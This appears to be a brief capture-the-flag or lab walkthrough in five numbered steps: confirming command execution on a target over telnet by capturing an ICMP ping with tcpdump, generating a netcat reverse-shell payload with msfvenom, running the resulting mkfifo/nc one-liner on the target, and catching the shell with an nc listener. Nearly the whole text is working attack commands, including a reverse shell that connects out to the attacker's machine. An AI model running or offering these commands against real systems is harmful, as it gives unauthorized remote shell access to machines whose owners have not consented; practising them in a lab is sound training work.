1) On Kali run:
    sudo tcpdump ip proto \\icmp -i tun0    

2) Telnet on the target and run:
    ping [local tun0 ip] -c 1

3) Create a msfvenom payload:
    msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

4) Run the command from the msfvenom payload about:
    mkfifo /tmp/aqzq; nc [local tun0 ip] 4444 0</tmp/aqzq | /bin/sh >/tmp/aqzq 2>&1; rm /tmp/aqzq

5) Set up a listener:
    nc -lvnp 4444